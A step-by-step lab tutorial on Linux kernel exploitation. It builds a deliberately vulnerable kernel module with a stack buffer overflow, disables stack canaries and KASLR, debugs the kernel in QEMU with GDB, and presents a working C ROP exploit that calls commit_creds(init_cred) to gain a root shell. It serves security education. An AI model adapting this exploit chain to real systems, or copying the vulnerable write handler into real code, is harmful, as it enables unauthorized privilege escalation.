Preparations
To accomplish the above goals, you’ll need the following utilities:
- GCC – a C compiler (to compile the kernel);
- GDB – a debugger (to debug the kernel);
- BC – a tool required to build the kernel;
- Make – a handler for kernel compilations recipes;
- Python – the interpreter for the Python language (to be used by GDB modules);
- pacstrap or debootstrap – system deployment scripts (required to build rootfs);
- any text editor (Vim or nano will be OK) to write the module and a recipe for it; and
- qemu-system-x86_64 – a virtual machine to run the kernel.
This humble set of tools is sufficient to build a kernel and exploit its module containing a vulnerability.
Kernel
First of all, you have to build a Linux kernel.
For the experimental purposes, I suggest taking the most recent stable kernel from kernel.org. At the time of the writing, it was Linux 5.12.4. In fact, the kernel version is unlikely to affect the result of the experiment; so, you can safely take the most current one. Download the archive, execute the command tar
, and go to the newly-created folder.
Configuration
You don’t have to build a universal kernel that can be run on any hardware. All you need is to run it in QEMU, and the basic configuration suggested by the developers is quite suitable for this purpose. Still, you have to make sure that you’ll have debugging symbols after the compilation and that you don’t have a stack canary (I’ll discuss this bird in more detail later).
There are many ways to set a correct configuration, but I strongly recommend to use menuconfig
since it’s convenient and doesn’t require a GUI. Run the make
command, and you’ll see the following picture.
To enable debugging symbols, go to Kernel hacking → Compile-time checks and compiler options. Select “Compile the kernel with debug info” and “Provide GDB scripts for kernel debugging.” In addition to the debugging symbols, you’ll get a very useful script vmlinux-gdb.
: a GDB module that helps to determine such things as the module base address in kernel memory.
Now you have to disable the stack protector to make your module exploitable. To do this, return to the main configuration screen, then go to “General architecture-dependent options”, and disable the “Stack Protector buffer overflow detection” function.
Press the “Save” button and exit the configuration windows. Later, you’ll see what this setting does.
Kernel compilation
There is nothing complicated there. Execute the command make
(threads
is the number of threads you want to use for kernel compilation) and watch the process.
The compilation speed depends on the processor: on a powerful computer, it takes some five minutes; on a weak one, much longer. In the meantime, you can continue reading this article.
Kernel module
The Linux kernel includes special files called character devices. In simple terms, a character device is a kind of a ‘device’ that can be used to perform basic operations, such as reading from and writing to it. But sometimes, this device may be paradoxically absent on your PC. Imagine, for instance, a device with the path /
; if you read from it, you’ll get zeros (zero bytes or \
in C notation). Such devices are called virtual ones, and the kernel includes special read and write handlers for them. You are going to write a kernel module that will enable you to write to the device (let’s call it/
), and the write
function for this device (the one called by the write
system call) will contain a buffer overflow vulnerability.
Module code and explanations
Create the vuln
subfolder to store the module in the folder with the kernel source code and place there the file vuln.
with the following content:
#include <linux/module.h>#include <linux/kernel.h>#include <linux/fs.h>#include <linux/kdev_t.h>#include <linux/device.h>#include <linux/cdev.h>MODULE_LICENSE("GPL"); // Licensestatic dev_t first;static struct cdev c_dev;static struct class *cl;static ssize_t vuln_read(struct file* file, char* buf, size_t count, loff_t *f_pos){ return -EPERM; // You don't need to read from the device; so, make it inaccessible for reading}static ssize_t vuln_write(struct file* file, const char* buf, size_t count, loff_t *f_pos){ char buffer[128]; int i; memset(buffer, 0, 128); for (i = 0; i < count; i++){ *(buffer + i) = buf[i]; } printk(KERN_INFO "Got happy data from userspace - %s", buffer); return count;}static int vuln_open(struct inode* inode, struct file* file) { return 0;}static int vuln_close(struct inode* inode, struct file* file) { return 0;}static struct file_operations fileops = { owner: THIS_MODULE, open: vuln_open, read: vuln_read, write: vuln_write, release: vuln_close,}; // Create a structure with file operations and handlersint vuln_init(void){ alloc_chrdev_region(&first, 0, 1, "vuln"); // Register the /dev device cl = class_create( THIS_MODULE, "chardev"); // Create a pointer to the class structure device_create(cl, NULL, first, NULL, "vuln"); // Create the device itself cdev_init(&c_dev, &fileops); // Set handlers cdev_add(&c_dev, first, 1); // Add the device to the system printk(KERN_INFO "Vuln module started\n"); return 0;}void vuln_exit(void){ // Remove and unregister the device cdev_del( &c_dev ); device_destroy( cl, first ); class_destroy( cl ); unregister_chrdev_region( first, 1 ); printk(KERN_INFO "Vuln module stopped??\n");}module_init(vuln_init); // Module entry point called by the insmod commandmodule_exit(vuln_exit); // Module exit point called by the rmmod command
This module creates a vuln
device in /
, and this device allows to write data to it. Its path is simple: /
. One might ask: what about the functions not supplied with comments? The answer is: their descriptions are available in this repository. Chances are high that you find there all functions documented in the Linux kernel in the form of man
pages.
Vulnerability
Note the vuln_write
function. 128 bytes are allocated on the stack for a message that will be written to your device and then outputted to kmsg
, the device for kernel logs. However, both the message and its size are controlled by the user, which makes it possible to write much more data than originally intended. In such a situation, a buffer overflow on the stack is inevitable, which leads to the subsequent control of the RIP (Relative Instruction Pointer) register, thus, enabling the attacker to create a ROP Chain. I’ll explain this in more detail in the section describing the vulnerability exploitation.
Module compilation
Module compilation is a pretty trivial task. To do this, create in the folder with the module source code a Makefile with the following content:
obj-m := vuln.o # Add to the list of compiled modulesall: make -C ../ M=./vuln # Call the main Makefile with the argument M=$(module folder) to compile it
After the compilation, the vuln.
file will appear in the folder. The ko
extension means Kernel Object, and it’s slightly different from regular .
objects. Congrats! You have built the kernel and a module for it. But before running it in QEMU, a few more operations have to be performed.
Rootfs
Contrary to popular belief, Linux by itself is not an operating system. This is just a kernel that constitutes a fully featured PC only in combination with GNU utilities and programs. By the way, its official name is GNU/Linux. If you start Linux alone, it will report a Kernel panic and notify you that there is no file system that can be used as the root. Even if there is a file system, the kernel will first try to start init
, a binary representing the main daemon process in the system that starts all services and other processes. If this file doesn’t exist or doesn’t work properly, the kernel will report panic. Therefore, you have to create a partition with userspace programs. For this purpose, I use pacstrap, a script installing Arch Linux. If you work with a Debian-like system, you can use debootstrap.
Possible variants
There are many ways to build a fully functional system; for instance, you can use LFS (Linux From Scratch), but this is too complicated. It’s also possible to create initramfs
(a file with a minimal filesystem required to perform some tasks prior to loading the main system). But the disadvantage of this method is that it’s difficult to make such a disk and even more difficult to edit it: the disk will have to be rebuilt from scratch. Therefore, let’s use another option: creation of the complete ext4 filesystem in a file.
Making disk
First, you have to allocate space for the filesystem. To do this, execute the command dd
. It will fill rootfs.
with zeros and set it size to 2 GB. Then you have to create the ext4 partition in this file. Run mkfs.
. You don’t need the superuser rights since the filesystem is created in your file. And the last operation prior to the system installation is: sudo
. Now you’ll need the superuser rights to mount this file system and perform manipulations inside it.
Installing Arch
Sounds scary? Don’t worry, when it comes to Manjaro or another similar Arch Linux system, everything is quite simple. There is a package in the repositories called arch-install-scripts
, and it containspacstrap
. After installing this package, execute the command sudo
and wait until all the main packages are downloaded.
Then copy vuln.
using the command:
cp <kernel sources>/vuln/vuln.ko /mnt/vuln.ko
Now the module is in the system.
Configuring the filesystem from inside
To be able to log into the system, you have to set up a superuser password. For this purpose, use arch-chroot
, it will automatically prepare the entire environment in the newly-created system. Run the command sudo
and then passwd
. Now you can log into the system after the boot-up.
You will also need two packages: GCC and any text editor (e.g. Vim). They are required to write and compile the exploit. To get these packages, use the command apt
on a Debian system and pacman
on an Arch-like OS. In addition, you have to create an unprivileged user on whose behalf you will test the exploit. To do this, run the commands useradd
and passwd
so that it has a home folder.
Exit chroot
by pressing Ctrl + d and type sync
(just in case).
Final touches
Mount rootfs.
using the command sudo
. After writing to /
, I always execute sync
to make sure that the written data aren’t lost in the cache. Now you are ready to run the kernel with your handmade module.
Running the kernel
After the compilation, the compressed kernel is located in <
. Even though it’s compressed, the kernel will run smoothly in QEMU because this is a self-extracting binary.
Provided that you are in the <
folder and rootfs.
is also located there, the command starting the kernel will be as follows:
qemu-system-x86_64 \
-kernel ./arch/x86/boot/bzImage \
-append "console=ttyS0,115200 root=/dev/sda rw nokaslr" \
-hda ./rootfs.img \
-nographic
In kernel
, you specify the path to the kernel, append
is the kernel command line, console=ttyS0,
indicates that the output will be transmitted to the ttyS0
device at a baud rate of 115,200 bps (this is a serial port from where QEMU gets the data). The argument root=/
makes the disk that you have enabled with thehda
key the root filesystem, while rw
makes this filesystem accessible for reading and writing (by default, it’s read-only). The nokaslr
parameter disables the randomization of addresses of kernel functions in the virtual memory. This option will simplify exploitation. Finally, -nographic
launches the kernel without a separate window (i.e. right in the console).
After launching the kernel, you can log in and access the console. However, if you go to /
, you won’t find your device. To make it appear, you have to run the command insmod /
. Startup messages will be added to kmsg
, and the vuln
device will appear in /
. However, there is a little problem: /
has permissions of 600. For exploitation, you need permissions of 666 or at least 622 so that any user can write to this file. Of course, you can manually enable a module in the kernel and change the permissions of a device, but this would be unprofessional. Just imagine that this is an important module that must be always launched together with the system. Therefore, this process must be automated.
Service for systemd
There are many ways to automate boot processes: you can write a script in /
, you can place it in ~/.
, or you can even rewrite init
so that your script starts first and the rest of the system – after it… However, the easiest way is to write a module for systemd
, the program that is init
itself and can automate things in an orderly way. Further steps will be performed in the system running in QEMU, and it will save all changes you have made.
The service itself
Basically, you have to do two things: load the module to the kernel and change the /
permissions to 666. The service is run as a script: once during the boot-up. Therefore, the service type is oneshot
.
[Unit]Name=Vulnerable module # Module name[Service]Type=oneshot # Module type. Will be executed onceExecStart=insmod /vuln.ko ; chmod 666 /dev/vuln # Command that loads the module and changes the permissions[Install]WantedBy=multi-user.target # After the module is loaded. Multi-user is a pretty standard feature for such modules
This code has to be stored in /
.
Running the service
Since the script must be run during the boot-up, the systemctl
command has to be executed on behalf of superuser.
After the restart, the vuln
file in /
will gain the rw-rw-rw-
permissions, which is great. Time has come for the most exciting part of the experiment. Press Ctrl + A, C, and D to exit QEMU.
Kernel debugging
You have to debug the kernel to see how it works during your calls. This will give you an idea of how to exploit the vulnerability. Seasoned pentesters are most likely aware of One gadget in libc
, a standard Linux C library that allows to run /
from a vulnerable program in userspace almost immediately.
GDB and vmlinux-gdb.py
To make your job easier, I strongly recommend using GEF. This GDB module shows the states of registers, stack, and code during runtime. You can get it here.
The first step is to allow the loading of third-party scripts, namely vmlinux-gdb.
(that is currently stored in the source code root folder, as well as vmlinux
, the file with kernel symbols). Later, this script will help you to find out the base address of the kernel module. To do this, add the line set
to ~/.
. Now, to load the symbols and the code, run the gdb
command. After that, start the kernel.
Remote kernel debugging
You already know how to start the kernel. The only problem is that it cannot be debugged. To enable debugging, you need QEMU to run a GDB server. To do this, add -gdb
to the command (tcp
is the connection protocol, while 1234
is the port). Start the kernel using the modified command and launch GDB in another window. To connect to the kernel, execute the command target
. The kernel will stop and wait for your actions.
You can see that QEMU is now frozen in a specific state because the kernel is stopped. Use the continue
command in GDB to resume its work. To pause, press Ctrl + C.
Exploitation strategy
In essence, kernel exploitation means privilege escalation – in most cases, to root. One of the ways to achieve this goal is as follows: you have to call the commit_creds
function with the init_cred
argument. Commit_creds
will grant the privileges described in init_cred
to the process. Init_cred
, in turn, has the permissions of the process number one (i.e. init, the maximum possible privileges in userspace). In the kernel code, it looks as follows:
struct cred init_cred = { .usage = ATOMIC_INIT(4),#ifdef CONFIG_DEBUG_CREDENTIALS .subscribers = ATOMIC_INIT(2), .magic = CRED_MAGIC,#endif .uid = GLOBAL_ROOT_UID, .gid = GLOBAL_ROOT_GID, .suid = GLOBAL_ROOT_UID, .sgid = GLOBAL_ROOT_GID, .euid = GLOBAL_ROOT_UID, .egid = GLOBAL_ROOT_GID, .fsuid = GLOBAL_ROOT_UID, .fsgid = GLOBAL_ROOT_GID, .securebits = SECUREBITS_DEFAULT, .cap_inheritable = CAP_EMPTY_SET, .cap_permitted = CAP_FULL_SET, .cap_effective = CAP_FULL_SET, .cap_bset = CAP_FULL_SET, .user = INIT_USER, .user_ns = &init_user_ns, .group_info = &init_groups,}
A more detailed description of this function is available in the above-mentioned repository. Overall, you have to somehow execute commit_creds(
while writing data to the vulnerable device. Let’s figure out how to do this.
Calling convention
Experienced pentesters can skip this section and two subsequent ones. Imagine that you have some standard code in C (e.g. sum(
). In its original form, the code looks very simple, but the processor doesn’t work with the source code: it uses instructions generated by the compiler. For the processor, this string will look as follows:
mov rdi, 3 ; Place first argument to the RDI registermov rsi, 2 ; Place second argument to the RSI registercall sum ; Call the sum function
As can be seen from the code, the first argument is stored in the RDI
register; while the second one, in RSI
. The output of this function (in this case, most likely 5) will be stored in the RAX
register. The x86_64 architecture includes 16 main fast registers: RAX
, RBX
, RCX
, RDX
, RDI
, RSI
, RSP
, RBP
, and R8-R15
; each of them stores 64 bits of information. So, to call the commit_creds(
function, you have to place the init_cred
address to the RDI
register and then call commit_creds
. Another important register is RSP (Relative Stack Pointer). This register stores a pointer to the stack from where the addresses are taken (e.g. for the ret
or pop
instructions).
ret
Ret
is an instruction that takes the last 64-bit value from the stack and jumps there. How to use it for your purposes? The point is that the only thing you can actually control is the stack. Almost any function in assembler ends with the ret
instruction that passes control to the calling function. If you can overwrite the so-called ret-address (the one that takes ret
from the stack), then you can control the code execution process, which is very useful. So, all you have to do is write init_cred
to RDI
.
Gadgets: pop rdi ; ret
Any compiled program includes small pieces of code that can be used to build a ROP chain. ROP (Return Oriented Programming) is a binary exploitation technique that allows you to write your own program inside the target program (provided that you control the stack), and your program performs whatever you need. These small pieces of code are called gadgets.
You have to find a gadget that takes a value from the stack you control, puts it in the RDI register, and shifts the pointer to the stack. The pop
instruction is ideal for this. It takes a value from the stack, puts it into the register, and shifts the stack. Then you need the ret
command that will jump to the commit_creds
address, thus, almost making a call
. Use the ROPGadget program to find such a gadget: run the command ROPGadget
and check the address of the found piece of code.
Save this address for future use.
A few words about the test kernel and simplifications
This is an important point since the kernel has been built with the disabled “Stack Protector buffer overflow detection” option. Although this kernel is used just as an example, enabling this option will most likely render the module invulnerable. To be specific, you won’t be able to escalate privileges, but can easily crash the kernel.
This function adds a ‘stack canary’, a random number that is pushed into the stack at the beginning of the function and checked at the end. Accordingly, if you rewrite something, kernel will understand that somebody is trying to hack it and will stop working.
On the other hand, you have probably noticed the word nokaslr
in the append
parameter of the QEMU startup command. The kernel, similar to any program in userspace, doesn’t want to be hacked. Therefore, there is such a thing in userspace as ASLR (Address Space Layout Randomization).
Imagine that you have a program that has the function you need at the address 0x50000
. The problem is that it cannot be executed directly in the code, but there is another function that has a buffer overflow vulnerability. In the absence of ASLR, a hacker can jump to this function and crack the program; but if ASLR is enabled, then the address of the target function changes randomly. As a result, the hacker first needs to find out the base address of the program and then calculate the real address of the function. ASLR was invented to make the exploitation of vulnerabilities much more difficult. Similar to ASLR, kaslr
was created for the kernel with the purpose to randomize its base address. Accordingly, the address received at the last step would be incorrect if kaslr
is enabled. Therefore, to simplify the exploitation, you turned off kaslr
using the nokaslr
parameter.
Final strategy
Overall, you have to perform five operations:
- Overflow the buffer with garbage data;
- Jump to
pop
;rdi; ret - Write
init_cred
toRDI
; - Jump to
commit_creds
; and - Return from the system call without any incidents.
You already know how to perform operations 2, 3, and 4. The only remaining steps are 1 and 5.
Overflow
Let’s examine the module code, namely the vuln_write
function, once again:
static ssize_t vuln_write(struct file* file, const char* buf, size_t count, loff_t *f_pos){ char buffer[128]; int i; memset(buffer, 0, 128); for (i = 0; i < count; i++){ *(buffer + i) = buf[i]; } printk(KERN_INFO "Got happy data from userspace - %s", buffer); return count;}
You don’t know how the compiler will store int
(i.e. whether it will be on the stack or in a register); therefore it’s time to review the disassembler output for this function.
To do this, you have to load the module code to GDB. First, run lx-lsmod
provided in vmlinux-gdb.
and find out the address of the vuln
module. Knowing the base address of the module, you can load vuln.
. Execute the command add-symbol-file ./
where address
is the hexadecimal value taken from lx-lsmod
. The function name is vuln_write
; so, type disassemble
.
You don’t need all these scary-looking instructions: select only those that operate with the stack. The first one is push
; at the end, it will be returned by pop
. This means that 8 bytes are already occupied. Next is the instruction add
; in fact, it doesn’t add to, but instead subtracts from rsp~
is decimal 128. In other words, this function allocates 128 bytes for the buffer and 8 more bytes to store r12
, i.e. 128 + 8 = 136 bytes.
By the way, if you look further, you will see that the i
variable is the edx
register (i.e. the lower 32 bits of the rdx
register). The return address from vuln_write
will be located immediately after the above-mentioned 136 bytes. So, to overflow the stack, you first have to fill 136 bytes with garbage data and then use a ROP Chain. Traditionally, A
characters are used as garbage; so, your exploit will begin with 136 A
characters. Knowing how to overflow the stack, you can proceed to the last point of this exploitation experiment.
Return from the system call
Here is a slight problem: you will overwrite exactly four 64-bit values on the stack after r12
, but this stack is, in fact, of no importance to you. Furthermore, the stack will be shifted by these 32 bytes. Therefore, there is no sense to return to the address where vuln_write
was initially supposed to return: the kernel can get to a wrong address and crash. To find out where to jump, you need to debug a little more and find out where should vuln_write
return.
Monitoring the vuln_write execution
Set a breakpoint at vuln_write
using the GDB command hbreak
. Then type continue
and resume the kernel operation. Enter the echo
command in QEMU to initiate writing asdf
to /
. Note that the kernel has paused and switch back to GDB. Using the ni
command, you have to get to the ret
instruction. Exit the function using ni
and continue moving forward until you reach the pop
instructions. As you can see, there are only six of them prior to ret
.
As said above, the stack is shifted by 32 bytes, but out of this amount, 8 bytes are occupied by the ret
instruction at the end of vuln_write
. This means that the stack is broken by 24 bytes. To fix it, you have to skip three pop
instructions. Although there is some code prior to these instructions, you have no choice but to ignore it. Remember the address of the 4th pop
instruction (pop
). You will jump to it after executing vuln_write
. Finally, you are ready to write the exploit.
Exploit
Make sure that GCC and a text editor (e.g. Vim) are installed in rootfs.
. This has to be done outside of QEMU because QEMU doesn’t have access to the Internet, and these packages cannot be installed from inside.
Getting addresses
To obtain the addresses of init_cred
and commit_creds
, execute the print
and print
commands in GDB.
Exploit as it is
The exploit will be written in C (which is logical for kernel exploitation). First, open /
for writing only. You will write to it the buffer containing your payload. The payload consists of 136 A
(or whatever) characters followed by the sequence of pop
, init_cred
, and commit_creds
addresses and ending with the pop
return address.
Important: the addresses will be written in reverse order (e.g. if the init_cred
address is 0xffffffff8244d2a0
, it will be written as \
). This is because x86_64 is a little-endian architecture. After creating the payload, write it to /
. As a result, the exploit process should gain superuser rights. To get a shell on behalf of the root, execute the command execve(
. The exploit code should look something like this:
#include <stdio.h>#include <fcntl.h>int main(){ unsigned char* kekw = malloc(168); memcpy(kekw, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x1a\x00\x81\xff\xff\xff\xff\xa0\xd2\x44\x82\xff\xff\xff\xff\x40\x45\x08\x81\xff\xff\xff\xff\x23\x22\x1d\x81\xff\xff\xff\xff", 168); int fd = open("/dev/vuln", O_WRONLY); write(fd, kekw, 168); execve("/bin/bash", NULL, NULL);}
Running the exploit
Make sure that you act on behalf of an unprivileged user. Log in as user
, compile the exploit with GCC, run it and… Voila! You can see that bash has started on behalf of the superuser. Note that root doesn’t own the binary, and the setuid bit isn’t set on it: this confirms that the kernel has been hacked.
Conclusions
Congrats! You have successfully completed the following tasks:
- Compiled a kernel with debugging symbols;
- Learned how to write a module and compile it;
- Built a root file system (rootfs) for the kernel to start with;
- Wrote a small oneshot module for systemd;
- Learned how to debug the kernel with GDB;
- Learned the ROP concept; and
- Used this trick to hack the kernel.
Of course, this was just a small step towards real-life kernel exploitation. As mentioned above, if KASLR or Stack protector were enabled, kernel exploitation would be impossible (or significantly more difficult). Still, I hope that this experience was interesting and useful to you. Good luck in your further pentesting endeavors!